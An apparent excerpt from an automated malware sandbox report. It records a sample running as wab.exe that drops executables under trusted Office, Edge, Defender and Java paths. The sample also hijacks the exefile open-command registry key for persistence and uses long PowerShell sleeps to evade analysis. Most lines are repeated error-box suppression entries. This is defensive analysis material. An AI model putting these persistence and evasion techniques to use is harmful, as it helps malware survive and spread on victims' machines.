Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Windows\svchost.com Jump to dropped file

Boot Survival
barindex
Creates an undocumented autostart registry key
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4460 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5418 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5858 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3995 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE Jump to dropped file
